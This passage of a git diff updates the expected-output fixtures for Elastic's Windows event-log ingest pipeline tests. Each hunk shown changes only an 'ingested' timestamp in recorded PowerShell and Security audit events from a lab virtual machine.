Name='RunspaceId'\u003e3f1a9181-0523-4645-a42c-2c1868c39332\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-PowerShell", 
@@ -253,7 +253,7 @@ "name": "vagrant" }, "event": { - "ingested": "2021-06-14T13:22:36.674286400Z", + "ingested": "2021-12-09T13:49:18.311036400Z", "code": "4104", "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-PowerShell' Guid='{a0c1853b-5c40-4b15-8766-3cf1c58f985a}'/\u003e\u003cEventID\u003e4104\u003c/EventID\u003e\u003cVersion\u003e1\u003c/Version\u003e\u003cLevel\u003e5\u003c/Level\u003e\u003cTask\u003e2\u003c/Task\u003e\u003cOpcode\u003e15\u003c/Opcode\u003e\u003cKeywords\u003e0x0\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2020-05-14T11:33:51.389266200Z'/\u003e\u003cEventRecordID\u003e3580\u003c/EventRecordID\u003e\u003cCorrelation ActivityID='{fb13c9de-29f7-0001-18e0-13fbf729d601}'/\u003e\u003cExecution ProcessID='4844' ThreadID='4428'/\u003e\u003cChannel\u003eMicrosoft-Windows-PowerShell/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-21-1350058589-2282154016-2764056528-1000'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='MessageNumber'\u003e1\u003c/Data\u003e\u003cData Name='MessageTotal'\u003e1\u003c/Data\u003e\u003cData Name='ScriptBlockText'\u003e.\\patata.ps1\u003c/Data\u003e\u003cData Name='ScriptBlockId'\u003e50d2dbda-7361-4926-a94d-d9eadfdb43fa\u003c/Data\u003e\u003cData Name='Path'\u003e\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e\n\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-PowerShell' Guid='{a0c1853b-5c40-4b15-8766-3cf1c58f985a}'/\u003e\u003cEventID\u003e4104\u003c/EventID\u003e\u003cVersion\u003e1\u003c/Version\u003e\u003cLevel\u003e5\u003c/Level\u003e\u003cTask\u003e2\u003c/Task\u003e\u003cOpcode\u003e15\u003c/Opcode\u003e\u003cKeywords\u003e0x0\u003c/Keywords\u003e\u003cTimeCreated 
SystemTime='2020-05-14T11:33:51.393884800Z'/\u003e\u003cEventRecordID\u003e3582\u003c/EventRecordID\u003e\u003cCorrelation ActivityID='{fb13c9de-29f7-0000-79db-13fbf729d601}'/\u003e\u003cExecution ProcessID='4844' ThreadID='4428'/\u003e\u003cChannel\u003eMicrosoft-Windows-PowerShell/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-21-1350058589-2282154016-2764056528-1000'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='MessageNumber'\u003e1\u003c/Data\u003e\u003cData Name='MessageTotal'\u003e1\u003c/Data\u003e\u003cData Name='ScriptBlockText'\u003e\u003c/Data\u003e\u003cData Name='ScriptBlockId'\u003ef5521cbd-656e-4296-b74d-9ffb4eec23b0\u003c/Data\u003e\u003cData Name='Path'\u003eC:\\Users\\vagrant\\Desktop\\patata.ps1\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-PowerShell", diff --git a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-powershell-operational-events.json-expected.json b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-powershell-operational-events.json-expected.json index ee7faa49f4f..16222c981bb 100644 --- a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-powershell-operational-events.json-expected.json +++ b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-powershell-operational-events.json-expected.json 
@@ -37,7 +37,7 @@ "name": "vagrant" }, "event": { - "ingested": "2021-06-14T13:22:37.106565300Z", + "ingested": "2021-12-09T13:49:18.946679500Z", "code": "4105", "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-PowerShell' Guid='{a0c1853b-5c40-4b15-8766-3cf1c58f985a}'/\u003e\u003cEventID\u003e4105\u003c/EventID\u003e\u003cVersion\u003e1\u003c/Version\u003e\u003cLevel\u003e5\u003c/Level\u003e\u003cTask\u003e102\u003c/Task\u003e\u003cOpcode\u003e15\u003c/Opcode\u003e\u003cKeywords\u003e0x0\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2020-05-13T09:04:04.755232500Z'/\u003e\u003cEventRecordID\u003e790\u003c/EventRecordID\u003e\u003cCorrelation ActivityID='{dd68516a-2930-0000-5962-68dd3029d601}'/\u003e\u003cExecution ProcessID='4204' ThreadID='1476'/\u003e\u003cChannel\u003eMicrosoft-Windows-PowerShell/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-21-1350058589-2282154016-2764056528-1000'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='ScriptBlockId'\u003ef4a378ab-b74f-41a7-a5ef-6dd55562fdb9\u003c/Data\u003e\u003cData Name='RunspaceId'\u003e9c031e5c-8d5a-4b91-a12e-b3624970b623\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-PowerShell", 
@@ -148,7 +148,7 @@ }, "event": { "sequence": 34, - "ingested": "2021-06-14T13:22:37.106575800Z", + "ingested": "2021-12-09T13:49:18.946689400Z", "code": "4103", "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-PowerShell' Guid='{a0c1853b-5c40-4b15-8766-3cf1c58f985a}'/\u003e\u003cEventID\u003e4103\u003c/EventID\u003e\u003cVersion\u003e1\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e106\u003c/Task\u003e\u003cOpcode\u003e20\u003c/Opcode\u003e\u003cKeywords\u003e0x0\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2020-05-15T08:11:47.897949500Z'/\u003e\u003cEventRecordID\u003e3885\u003c/EventRecordID\u003e\u003cCorrelation ActivityID='{1aca0717-2acb-0002-c208-ca1acb2ad601}'/\u003e\u003cExecution ProcessID='3984' ThreadID='3616'/\u003e\u003cChannel\u003eMicrosoft-Windows-PowerShell/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-21-1350058589-2282154016-2764056528-1000'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='ContextInfo'\u003e Severity = Informational\n Host Name = ServerRemoteHost\n Host Version = 1.0.0.0\n Host ID = ed57761b-ba0f-4d11-87d9-fac33820d20e\n Host Application = C:\\Windows\\system32\\wsmprovhost.exe -Embedding\n Engine Version = 5.1.17763.1007\n Runspace ID = 0729459a-8646-4176-8b02-024421a9632e\n Pipeline ID = 1\n Command Name = cmd.exe\n Command Type = Application\n Script Name =\n Command Path = C:\\Windows\\system32\\cmd.exe\n Sequence Number = 34\n User = VAGRANT\\vagrant\n Connected User = VAGRANT\\vagrant\n Shell ID = Microsoft.PowerShell\n\u003c/Data\u003e\u003cData Name='UserData'\u003e\u003c/Data\u003e\u003cData Name='Payload'\u003eCommandInvocation(cmd.exe): \"cmd.exe\"\nCommandInvocation(Out-Null): \"Out-Null\"\nParameterBinding(Out-Null): name=\"InputObject\"; value=\"symbolic link created for C:\\vagrant 
\u0026lt;\u0026lt;===\u0026gt;\u0026gt; \\\\vboxsvr\\vagrant\"\n\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e\n\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-PowerShell' Guid='{a0c1853b-5c40-4b15-8766-3cf1c58f985a}'/\u003e\u003cEventID\u003e4103\u003c/EventID\u003e\u003cVersion\u003e1\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e106\u003c/Task\u003e\u003cOpcode\u003e20\u003c/Opcode\u003e\u003cKeywords\u003e0x0\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2020-05-15T08:13:06.703293900Z'/\u003e\u003cEventRecordID\u003e3917\u003c/EventRecordID\u003e\u003cCorrelation ActivityID='{1aca0717-2acb-0003-db0b-ca1acb2ad601}'/\u003e\u003cExecution ProcessID='5032' ThreadID='4160'/\u003e\u003cChannel\u003eMicrosoft-Windows-PowerShell/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-21-1350058589-2282154016-2764056528-1000'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='ContextInfo'\u003e Severity = Informational\n Host Name = ConsoleHost\n Host Version = 5.1.17763.1007\n Host ID = aae5217d-054f-435f-9968-4b5bebf12116\n Host Application = C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -noexit -command 'C:\\Gopath\\src\\github.com\\elastic\\beats'\n Engine Version = 5.1.17763.1007\n Runspace ID = a87e8389-57c7-4997-95ff-f82f644965bf\n Pipeline ID = 9\n Command Name = Resolve-Path\n Command Type = Cmdlet\n Script Name =\n Command Path =\n Sequence Number = 22\n User = VAGRANT\\vagrant\n Connected User =\n Shell ID = Microsoft.PowerShell\n\u003c/Data\u003e\u003cData Name='UserData'\u003e\u003c/Data\u003e\u003cData Name='Payload'\u003eCommandInvocation(Resolve-Path): \"Resolve-Path\"\nParameterBinding(Resolve-Path): name=\"ErrorAction\"; value=\"Ignore\"\nParameterBinding(Resolve-Path): name=\"WarningAction\"; value=\"Ignore\"\nParameterBinding(Resolve-Path): 
name=\"InformationAction\"; value=\"Ignore\"\nParameterBinding(Resolve-Path): name=\"Verbose\"; value=\"False\"\nParameterBinding(Resolve-Path): name=\"Debug\"; value=\"False\"\nParameterBinding(Resolve-Path): name=\"Path\"; value=\"C:\\Gopath\\src\\github.com\\elastic\\beats\\x*\"\n\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-PowerShell", @@ -199,7 +199,7 @@ "name": "vagrant" }, "event": { - "ingested": "2021-06-14T13:22:37.106582500Z", + "ingested": "2021-12-09T13:49:18.946695800Z", "code": "4106", "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-PowerShell' Guid='{a0c1853b-5c40-4b15-8766-3cf1c58f985a}'/\u003e\u003cEventID\u003e4106\u003c/EventID\u003e\u003cVersion\u003e1\u003c/Version\u003e\u003cLevel\u003e5\u003c/Level\u003e\u003cTask\u003e103\u003c/Task\u003e\u003cOpcode\u003e15\u003c/Opcode\u003e\u003cKeywords\u003e0x0\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2020-05-13T10:40:32.595715200Z'/\u003e\u003cEventRecordID\u003e933\u003c/EventRecordID\u003e\u003cCorrelation ActivityID='{e3200b8a-290e-0002-332a-20e30e29d601}'/\u003e\u003cExecution ProcessID='4776' ThreadID='5092'/\u003e\u003cChannel\u003eMicrosoft-Windows-PowerShell/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-21-1350058589-2282154016-2764056528-1000'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='ScriptBlockId'\u003e4c487c13-46f7-4485-925b-34855c7e873c\u003c/Data\u003e\u003cData Name='RunspaceId'\u003e3f1a9181-0523-4645-a42c-2c1868c39332\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-PowerShell", 
@@ -253,7 +253,7 @@ "name": "vagrant" }, "event": { - "ingested": "2021-06-14T13:22:37.106588800Z", + "ingested": "2021-12-09T13:49:18.946702100Z", "code": "4104", "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-PowerShell' Guid='{a0c1853b-5c40-4b15-8766-3cf1c58f985a}'/\u003e\u003cEventID\u003e4104\u003c/EventID\u003e\u003cVersion\u003e1\u003c/Version\u003e\u003cLevel\u003e5\u003c/Level\u003e\u003cTask\u003e2\u003c/Task\u003e\u003cOpcode\u003e15\u003c/Opcode\u003e\u003cKeywords\u003e0x0\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2020-05-14T11:33:51.389266200Z'/\u003e\u003cEventRecordID\u003e3580\u003c/EventRecordID\u003e\u003cCorrelation ActivityID='{fb13c9de-29f7-0001-18e0-13fbf729d601}'/\u003e\u003cExecution ProcessID='4844' ThreadID='4428'/\u003e\u003cChannel\u003eMicrosoft-Windows-PowerShell/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-21-1350058589-2282154016-2764056528-1000'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='MessageNumber'\u003e1\u003c/Data\u003e\u003cData Name='MessageTotal'\u003e1\u003c/Data\u003e\u003cData Name='ScriptBlockText'\u003e.\\patata.ps1\u003c/Data\u003e\u003cData Name='ScriptBlockId'\u003e50d2dbda-7361-4926-a94d-d9eadfdb43fa\u003c/Data\u003e\u003cData Name='Path'\u003e\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e\n\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-PowerShell' Guid='{a0c1853b-5c40-4b15-8766-3cf1c58f985a}'/\u003e\u003cEventID\u003e4104\u003c/EventID\u003e\u003cVersion\u003e1\u003c/Version\u003e\u003cLevel\u003e5\u003c/Level\u003e\u003cTask\u003e2\u003c/Task\u003e\u003cOpcode\u003e15\u003c/Opcode\u003e\u003cKeywords\u003e0x0\u003c/Keywords\u003e\u003cTimeCreated 
SystemTime='2020-05-14T11:33:51.393884800Z'/\u003e\u003cEventRecordID\u003e3582\u003c/EventRecordID\u003e\u003cCorrelation ActivityID='{fb13c9de-29f7-0000-79db-13fbf729d601}'/\u003e\u003cExecution ProcessID='4844' ThreadID='4428'/\u003e\u003cChannel\u003eMicrosoft-Windows-PowerShell/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-21-1350058589-2282154016-2764056528-1000'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='MessageNumber'\u003e1\u003c/Data\u003e\u003cData Name='MessageTotal'\u003e1\u003c/Data\u003e\u003cData Name='ScriptBlockText'\u003e\u003c/Data\u003e\u003cData Name='ScriptBlockId'\u003ef5521cbd-656e-4296-b74d-9ffb4eec23b0\u003c/Data\u003e\u003cData Name='Path'\u003eC:\\Users\\vagrant\\Desktop\\patata.ps1\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-PowerShell", diff --git a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-1100.json-expected.json b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-1100.json-expected.json index ea7e43f5061..ab2b941ceb7 100644 --- a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-1100.json-expected.json +++ b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-1100.json-expected.json @@ -43,7 +43,7 @@ "name": "WIN-41OB2LO92CR.wlbeat.local" }, "event": { - "ingested": "2021-06-14T13:22:37.474348700Z", + "ingested": "2021-12-09T13:49:19.558723400Z", "code": "1100", "provider": "Microsoft-Windows-Eventlog", "kind": "event", diff --git a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-1102.json-expected.json b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-1102.json-expected.json index 525b5c4f900..4379d1339aa 100644 --- a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-1102.json-expected.json 
+++ b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-1102.json-expected.json @@ -58,7 +58,7 @@ "name": "WIN-41OB2LO92CR.wlbeat.local" }, "event": { - "ingested": "2021-06-14T13:22:37.580222Z", + "ingested": "2021-12-09T13:49:19.713823200Z", "code": "1102", "provider": "Microsoft-Windows-Eventlog", "kind": "event", diff --git a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-1104.json-expected.json b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-1104.json-expected.json index 664388c55b4..8ffc31b1602 100644 --- a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-1104.json-expected.json +++ b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-1104.json-expected.json @@ -43,7 +43,7 @@ "name": "WIN-41OB2LO92CR.wlbeat.local" }, "event": { - "ingested": "2021-06-14T13:22:37.727423800Z", + "ingested": "2021-12-09T13:49:19.942134900Z", "code": "1104", "provider": "Microsoft-Windows-Eventlog", "kind": "event", diff --git a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-1105.json-expected.json b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-1105.json-expected.json index a34cfa67580..c853233334b 100644 --- a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-1105.json-expected.json +++ b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-1105.json-expected.json @@ -48,7 +48,7 @@ "name": "WIN-41OB2LO92CR.wlbeat.local" }, "event": { - "ingested": "2021-06-14T13:22:37.823729Z", + "ingested": "2021-12-09T13:49:20.094475800Z", "code": "1105", "provider": "Microsoft-Windows-Eventlog", "kind": "event", diff --git a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4670-windowssrv2016.json-expected.json b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4670-windowssrv2016.json-expected.json index 77c9b043526..79c55bc7fa3 100644 
--- a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4670-windowssrv2016.json-expected.json +++ b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4670-windowssrv2016.json-expected.json @@ -73,7 +73,7 @@ "name": "WIN-BVM4LI1L1Q6.TEST.local" }, "event": { - "ingested": "2021-06-14T13:22:37.931030700Z", + "ingested": "2021-12-09T13:49:20.259672100Z", "code": "4670", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4706-windowssrv2016.json-expected.json b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4706-windowssrv2016.json-expected.json index d4806fc81f6..eca02db6f6b 100644 --- a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4706-windowssrv2016.json-expected.json +++ b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4706-windowssrv2016.json-expected.json @@ -67,7 +67,7 @@ "name": "WIN-BVM4LI1L1Q6.TEST.local" }, "event": { - "ingested": "2021-06-14T13:22:38.117594800Z", + "ingested": "2021-12-09T13:49:20.536429600Z", "code": "4706", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4707-windowssrv2016.json-expected.json b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4707-windowssrv2016.json-expected.json index da67dee199d..f736e4bffb1 100644 --- a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4707-windowssrv2016.json-expected.json +++ b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4707-windowssrv2016.json-expected.json @@ -59,7 +59,7 @@ "name": "WIN-BVM4LI1L1Q6.TEST.local" }, "event": { - "ingested": "2021-06-14T13:22:38.264733800Z", + "ingested": "2021-12-09T13:49:20.783827300Z", "code": "4707", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", 
diff --git a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4713-windowssrv2016.json-expected.json b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4713-windowssrv2016.json-expected.json index 43ac396baf7..06701098979 100644 --- a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4713-windowssrv2016.json-expected.json +++ b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4713-windowssrv2016.json-expected.json @@ -59,7 +59,7 @@ "name": "WIN-BVM4LI1L1Q6.TEST.local" }, "event": { - "ingested": "2021-06-14T13:22:38.384542Z", + "ingested": "2021-12-09T13:49:21.000818800Z", "code": "4713", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4716-windowssrv2016.json-expected.json b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4716-windowssrv2016.json-expected.json index 1da22d4c2ab..d7d461105a0 100644 --- a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4716-windowssrv2016.json-expected.json +++ b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4716-windowssrv2016.json-expected.json @@ -67,7 +67,7 @@ "name": "WIN-BVM4LI1L1Q6.TEST.local" }, "event": { - "ingested": "2021-06-14T13:22:38.521696600Z", + "ingested": "2021-12-09T13:49:21.215352400Z", "code": "4716", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4717-windowssrv2016.json-expected.json b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4717-windowssrv2016.json-expected.json index e5df4698d53..918efde2780 100644 --- a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4717-windowssrv2016.json-expected.json 
+++ b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4717-windowssrv2016.json-expected.json @@ -60,7 +60,7 @@ "name": "WIN-BVM4LI1L1Q6" }, "event": { - "ingested": "2021-06-14T13:22:38.676440100Z", + "ingested": "2021-12-09T13:49:21.448485700Z", "code": "4717", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4718-windowssrv2016.json-expected.json b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4718-windowssrv2016.json-expected.json index 9ee7ad3c102..b06e2d07153 100644 --- a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4718-windowssrv2016.json-expected.json +++ b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4718-windowssrv2016.json-expected.json @@ -60,7 +60,7 @@ "name": "WIN-BVM4LI1L1Q6" }, "event": { - "ingested": "2021-06-14T13:22:38.797606800Z", + "ingested": "2021-12-09T13:49:21.686161200Z", "code": "4718", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4719-windowssrv2016.json-expected.json b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4719-windowssrv2016.json-expected.json index 0bed3b39389..72aa79bbc99 100644 --- a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4719-windowssrv2016.json-expected.json +++ b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4719-windowssrv2016.json-expected.json @@ -67,7 +67,7 @@ "name": "WIN-BVM4LI1L1Q6.TEST.local" }, "event": { - "ingested": "2021-06-14T13:22:38.919300Z", + "ingested": "2021-12-09T13:49:21.922092300Z", "code": "4719", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", 
diff --git a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4719.json-expected.json b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4719.json-expected.json index 7f51c9617a6..643dd43d001 100644 --- a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4719.json-expected.json +++ b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4719.json-expected.json @@ -68,7 +68,7 @@ "name": "WIN-41OB2LO92CR.wlbeat.local" }, "event": { - "ingested": "2021-06-14T13:22:39.055780900Z", + "ingested": "2021-12-09T13:49:22.158931800Z", "code": "4719", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4739-windowssrv2016.json-expected.json b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4739-windowssrv2016.json-expected.json index ad644b18321..0411434ab67 100644 --- a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4739-windowssrv2016.json-expected.json +++ b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4739-windowssrv2016.json-expected.json @@ -66,7 +66,7 @@ "name": "WIN-BVM4LI1L1Q6.TEST.local" }, "event": { - "ingested": "2021-06-14T13:22:39.209969500Z", + "ingested": "2021-12-09T13:49:22.386517Z", "code": "4739", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4743.json-expected.json b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4743.json-expected.json index 87c4f455b75..c1c4261d6b5 100644 --- a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4743.json-expected.json +++ b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4743.json-expected.json 
@@ -68,7 +68,7 @@ "name": "DC_TEST2k12.TEST.SAAS" }, "event": { - "ingested": "2021-06-14T13:22:39.359938300Z", + "ingested": "2021-12-09T13:49:22.618861600Z", "code": "4743", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4744.json-expected.json b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4744.json-expected.json index bc12d4d5006..3b3ab546d15 100644 --- a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4744.json-expected.json +++ b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4744.json-expected.json @@ -63,7 +63,7 @@ "name": "DC_TEST2k12.TEST.SAAS" }, "event": { - "ingested": "2021-06-14T13:22:39.496809300Z", + "ingested": "2021-12-09T13:49:22.888830Z", "code": "4744", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4745.json-expected.json b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4745.json-expected.json index 8c7e354b775..8d7722f421a 100644 --- a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4745.json-expected.json +++ b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4745.json-expected.json @@ -63,7 +63,7 @@ "name": "DC_TEST2k12.TEST.SAAS" }, "event": { - "ingested": "2021-06-14T13:22:39.664588Z", + "ingested": "2021-12-09T13:49:23.142370200Z", "code": "4745", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4746.json-expected.json b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4746.json-expected.json index da3a343adfc..d467909b836 100644 --- a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4746.json-expected.json 
+++ b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4746.json-expected.json @@ -64,7 +64,7 @@ "name": "DC_TEST2k12.TEST.SAAS" }, "event": { - "ingested": "2021-06-14T13:22:39.818276800Z", + "ingested": "2021-12-09T13:49:23.385857700Z", "code": "4746", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4747.json-expected.json b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4747.json-expected.json index 82ebaa8f4ed..a441421a6e5 100644 --- a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4747.json-expected.json +++ b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4747.json-expected.json @@ -64,7 +64,7 @@ "name": "DC_TEST2k12.TEST.SAAS" }, "event": { - "ingested": "2021-06-14T13:22:39.969342600Z", + "ingested": "2021-12-09T13:49:23.679961Z", "code": "4747", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4748.json-expected.json b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4748.json-expected.json index 1e7cad0a197..461e6aba397 100644 --- a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4748.json-expected.json +++ b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4748.json-expected.json @@ -61,7 +61,7 @@ "name": "DC_TEST2k12.TEST.SAAS" }, "event": { - "ingested": "2021-06-14T13:22:40.116998500Z", + "ingested": "2021-12-09T13:49:23.991318600Z", "code": "4748", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4749.json-expected.json b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4749.json-expected.json index 24a5d1e398f..e3e8effd983 100644 
